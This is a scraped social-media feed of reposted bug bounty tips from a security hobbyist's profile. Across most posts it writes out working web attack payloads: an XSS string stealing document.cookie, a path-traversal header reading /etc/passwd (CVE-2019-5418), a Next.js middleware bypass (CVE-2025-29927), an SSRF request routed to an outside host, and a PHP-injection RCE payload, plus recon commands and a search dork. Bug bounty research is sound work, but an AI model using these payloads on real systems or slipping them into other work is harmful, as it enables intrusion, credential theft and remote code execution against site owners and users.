Ch4xcker's profile picture. Bug bounty learner

Chax

@Ch4xcker

Bug bounty learner

Chax reposted

I just work 8 hours no stop on bypassing Post XSS and I made it. CSRF bypass was not easy but better than XSS. Just watch the Title. 🙃 You can find payload and tip in follow comment. #BugBounty #bugbountytip

eulex0x's tweet image. I just work 8 hours no stop on bypassing Post XSS and I made it.

CSRF bypass was not easy but better than XSS.

Just watch the Title. 🙃

You can find payload and tip  in follow comment.
#BugBounty #bugbountytip

Chax reposted

XSS Bypass Method: Payload: ">>>>>><marquee>RXSS</marquee></head><abc></script><script>alert(document.cookie)</script><meta #BugBounty #XSS

NullSecurityX's tweet image. XSS Bypass Method:

Payload:
&quot;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;lt;marquee&amp;gt;RXSS&amp;lt;/marquee&amp;gt;&amp;lt;/head&amp;gt;&amp;lt;abc&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&amp;lt;meta

#BugBounty #XSS

Chax reposted

SQL Joins Cheatsheet 📘📚 Save it for later ✅️ #sql

Krishnasagrawal's tweet image. SQL Joins Cheatsheet 📘📚

Save it for later ✅️ 

#sql

Chax reposted

XSS payload bypassing Imperva WAF: Find the payload in the image attached. X isn't allowing me post the payload :( #BugBounty #bugbountytips

rahul0x01's tweet image. XSS payload bypassing Imperva WAF:

Find the payload in the image attached. 
X isn&apos;t allowing me post the payload :(

#BugBounty #bugbountytips

< > " ' reflection but Imperva firewall. If you know someone who's good at XSS. Kindly tag. @bug_vs_me @xssdoctor @xss0r @theXSSrat

rahul0x01's tweet image. &amp;lt; &amp;gt; &quot; &apos; reflection but Imperva firewall. If you know someone who&apos;s good at XSS. Kindly tag.

@bug_vs_me @xssdoctor @xss0r @theXSSrat


Chax reposted

Nextjs SSRF in Middleware header! ✅POC: GET / HTTP/1.1 Host: target. com Location: http://oast. me X-Middleware-Rewrite: http://oast. me For more BugBounty tips join my telegram channel 👉🏼 t.me/ShellSec


Chax reposted

Many bug hunters ignore blank 401 Unauthorized pages. If you ever land on a 401 Unauthorized page (like in the image), always check the response, you might find something big. #BugBounty #bugbountytips #appsec #latepost

rahul0x01's tweet image. Many bug hunters ignore blank 401 Unauthorized pages.

If you ever land on a 401 Unauthorized page (like in the image), always check the response, you might find something big.

#BugBounty #bugbountytips #appsec #latepost
rahul0x01's tweet image. Many bug hunters ignore blank 401 Unauthorized pages.

If you ever land on a 401 Unauthorized page (like in the image), always check the response, you might find something big.

#BugBounty #bugbountytips #appsec #latepost
rahul0x01's tweet image. Many bug hunters ignore blank 401 Unauthorized pages.

If you ever land on a 401 Unauthorized page (like in the image), always check the response, you might find something big.

#BugBounty #bugbountytips #appsec #latepost
rahul0x01's tweet image. Many bug hunters ignore blank 401 Unauthorized pages.

If you ever land on a 401 Unauthorized page (like in the image), always check the response, you might find something big.

#BugBounty #bugbountytips #appsec #latepost

Chax reposted

I've made $500k+ from SSRF vulnerabilities. Here are my tricks:

hacker_'s tweet image. I&apos;ve made $500k+ from SSRF vulnerabilities.

Here are my tricks:

Chax reposted

Improper Authorization🥰

JoaoGomes12243's tweet image. Improper Authorization🥰

Chax reposted

If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found. Intercept the request in Burp and replace the Accept header with: `Accept: ../../../../../../../../../../etc/passwd{{` #bugbountytips

nav1n0x's tweet image. If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found.

Intercept the request in Burp and replace the Accept header with: `Accept: ../../../../../../../../../../etc/passwd{{` #bugbountytips

Chax reposted

#Tips :- 1- As usual i Fuzzed all live subs using my  custom short information disclosure wordlist :- cat live-subs.txt | python3 dirsearch.py -i 200 -e php,bak,old,zip,tar.gz,txt,log,conf,json,asp,j p,aspx,yml,yaml,rar --stdin

wadgamaraldeen's tweet image. #Tips :- 

1- As usual i Fuzzed all live subs using my  custom short information disclosure wordlist :-

cat live-subs.txt | python3 dirsearch.py -i 200 -e php,bak,old,zip,tar.gz,txt,log,conf,json,asp,j p,aspx,yml,yaml,rar --stdin
wadgamaraldeen's tweet image. #Tips :- 

1- As usual i Fuzzed all live subs using my  custom short information disclosure wordlist :-

cat live-subs.txt | python3 dirsearch.py -i 200 -e php,bak,old,zip,tar.gz,txt,log,conf,json,asp,j p,aspx,yml,yaml,rar --stdin

Chax reposted

XSS Bypassed #bugbounty

HackTube5's tweet image. XSS Bypassed #bugbounty
HackTube5's tweet image. XSS Bypassed #bugbounty

Chax reposted

Bug-Hunt tips for new hunters - httpx -l subs.txt -ports 81,8000,8080,8443,8888 -title Find apps not running on standard ports. Make changes with ports by a small search over Google and repeat the process Peace and Salam✌️


Chax reposted

CVE-2025-29927 Exploitation : X-Nextjs-Data: 1 X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

h4x0r_fr34k's tweet image. CVE-2025-29927 

Exploitation :
X-Nextjs-Data: 1
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
h4x0r_fr34k's tweet image. CVE-2025-29927 

Exploitation :
X-Nextjs-Data: 1
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
h4x0r_fr34k's tweet image. CVE-2025-29927 

Exploitation :
X-Nextjs-Data: 1
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

Chax reposted

Found the same bug on two Subdomains :-)

__M9nx's tweet image. Found the same bug on two Subdomains :-)

Chax reposted

ㅤ 🔥Find all VDP in world wide using this simple dork😎 Dork: (body="/responsible-disclosure" || body="/.well-known/security.txt") && port="443" ✨For more bugbounty & pen testing tips join my telegram channel 🤍 t.me/ShellSec


Chax reposted

How to grab all Graphql query/mutation if introspection disabled? 1. Download all js files to directory js_files 2. Run this command: grep -Eo '(query|mutation) [a-zA-Z0-9_]+\(' js_files -R 1/n #bugbountytips #graphql

bugoverfl0w's tweet image. How to grab all Graphql query/mutation if introspection disabled?

1. Download all js files  to directory js_files
2. Run this command:
grep -Eo &apos;(query|mutation) [a-zA-Z0-9_]+\(&apos; js_files -R

1/n 
#bugbountytips #graphql

Chax reposted

#Tips :- 1- Replace dirsearch w-list with my short info disclosure w-list :- github.com/wadgamaraldeen… ( updated continuesly) 2- Type :- cat live-subs.txt | python3 dirsearch.py -i 200 -e php,bak,old,zip,tar.gz,txt,log,conf,json,asp,j p,aspx,yml,yaml,rar --stdin


Chax reposted

This is the quickest RCE I've ever gotten. The app has a popup for multi-selection fields. I intercepted the request, expecting XSS or SQLi, but found that the parameter **_session_name= can be exploited to get an #RCE as a surprise. Payload: `&**='.print((`id`)).'` #BugBounty

nav1n0x's tweet image. This is the quickest RCE I&apos;ve ever gotten. 

The app has a popup for multi-selection fields. I intercepted the request, expecting XSS or SQLi, but found that the parameter **_session_name= can be exploited to get an #RCE as a surprise.

Payload: `&amp;amp;**=&apos;.print((`id`)).&apos;` #BugBounty

Chax reposted

Steps: 1. Get all urls (waymore) 2. Extract all Parameters (paramspider) 3. Use nuclei dast templates nuclei -l parameter_based_urls.txt -t nuclei-templates/dast/ -dast Post Credit: Mijanur Rahman #hackerone #ethicalhacking #bugbounty #cybersecurity #sqli #xss #infosec

viehgroup's tweet image. Steps:

1. Get all urls (waymore)
2. Extract all Parameters (paramspider)
3. Use nuclei dast templates
nuclei -l parameter_based_urls.txt -t nuclei-templates/dast/ -dast

Post Credit: Mijanur Rahman

#hackerone #ethicalhacking #bugbounty #cybersecurity #sqli #xss #infosec

Chax reposted

Power of own tools (script writing) #BugBounty #bugbounty #infosec #Hacking

Suryesh_92's tweet image. Power of own tools (script writing)

#BugBounty #bugbounty #infosec #Hacking

Hi Guys, I completed one of the most interesting tool , going to release during live session. very soon I and our team (@Mr_mars_hacker , @OreoBiscui74046 and some other ) will do live session on bug bounty. i hope you will learn something new. Stay tuned ✅ #BugBounty #bug

Suryesh_92's tweet image. Hi Guys, I completed one of the most interesting tool , going to release during live session. very soon I and our team (@Mr_mars_hacker , @OreoBiscui74046 and some other ) will do live session on bug bounty. i hope you will learn something new.
Stay tuned ✅
#BugBounty #bug


Loading...

Something went wrong.


Something went wrong.